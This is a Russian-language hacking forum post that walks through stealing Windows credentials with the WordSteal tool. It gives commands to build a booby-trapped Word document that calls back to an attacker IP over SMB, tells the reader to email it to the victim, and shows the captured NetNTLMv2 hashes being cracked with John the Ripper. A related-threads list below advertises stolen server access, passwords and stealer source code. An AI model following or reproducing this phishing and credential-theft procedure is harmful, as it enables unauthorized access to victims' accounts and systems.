WordSteal - Похищаем пароли Windows

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Привет! В этой статье мы поговорим как, в принципе, легко и без хлопот заполучить учетные данные пользователя Windows системы.

Для этого предлагаю использовать инструмент, Word Steal который, замечательно с этим справляется.

ef1feefb79707f75f1392.png

Этот скрипт создаст POC, который в свою очередь предоставит нам хэши NTLM (NTLM (NT LAN Manager) — является протоколом сетевой аутентификации, разработанным фирмой Microsoft для Windows NT.) с удаленного компьютера. Данные мы будем получать по протоколу SMB, сгенерированный вредоносный файл не кажется таковым с точки зрения рядового пользователя. Итак, приступим, для начала скачиваем Word Steal с репозиториев git.

Атакующая сторона – Kali Linux 2016.2 Rolling.

> git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



977272c2c9ef329823d26.png

Затем дадим права на исполнение файлу main.py.

> cd WordSteal

> ls –a

> chmod +x main.py

d8f053d9215af26cd0a9e.png

Скачаем любую картинку в формате .jpeg и поместим ее в папку с Word Steal.

f417b4e4a921b243aabf0.png

Теперь приступим к созданию главного файла, запускаем программу с такими параметрами:

> python main.py 172.16.0.151 (Это адрес атакующего хоста) i.jpeg 1

776818a7f51f1a45131ec.png

После окончания работы сценария в папке с Word Steal образуется такой файл:

1873d4571a81c81e2bd3e.png

Его необходимо доставить на целевой хост, для этого идеально подходит почта, отправляем:

61fda24d0551861d40e61.png

Сохраняем файл на целевом хосте и открываем, теперь вернемся к консоли линукс и посмотрим, что происходит там:

e5b29e10bd23ebe10add7.png

На скриншоте видно, что соединение установилось, и мы получили хэши паролей, в папке с Word Steal появился файлик:

Это файл с хэшами, пароли из них будем восстанавливать с помощью john the ripper:

> john passwords_netntlmv2

35b46947c4b5ee3ef2f32.png

Как видно, ему удалось восстановить мой пароль, но это лишь в том случае если он есть в базе (словаре) если бы я его туда не добавил, то вероятно ничего бы не произошло. В общем, как-то так, на этом все, спасибо за внимание.
 
Название темы
Автор Заголовок Раздел Ответы Дата
Support81 Взлом или небрежность? Код и пароли Binance были доступны на GitHub в течение нескольких месяцев Новости в сети 0
balof Интересно Находим чужие пароли в Google Полезные статьи 0
Denik Интересно Обнаружена вредоносная программа, которая крадет сохраненные пароли из популярных браузеров Новости в сети 0
H Продам Рутовые шелы, пароли админов, доступы к бд, сорцы, видеонаблюдение, доступы к CISCO, данные сотрудников в одном крупном иностранном казино. Доступы - FTP, shell'ы, руты, sql-inj, БД 3
Denik Интересно Угоняем логины и пароли с фишинговых сайтов Полезные статьи 3
Denik Интересно Как взломать пароли с помощью флэшки Уязвимости и взлом 3
D Как вытащить пароли? Вопросы и интересы 1
R Пробью пароли по логину или почте Другое 1
I Исходники стиллера NoFile (пароли, куки, wallet.dat ,телеграмы, скайпы) С/C++ 0
S Вы мне мыло, я вам пароли AntiPublic Полезные статьи 7
J как достать пароли с куки Вопросы и интересы 5
J как достать пароли с куки Вопросы и интересы 1
G Воруем пароли из Google Chrome Полезные статьи 1
A Логины и пароли студентов Раздача (аккаунтов/ключей) 4
Admin Заводские логины и пароли IP-камер которые стоят по умолчанию Уязвимости и взлом 0

Название темы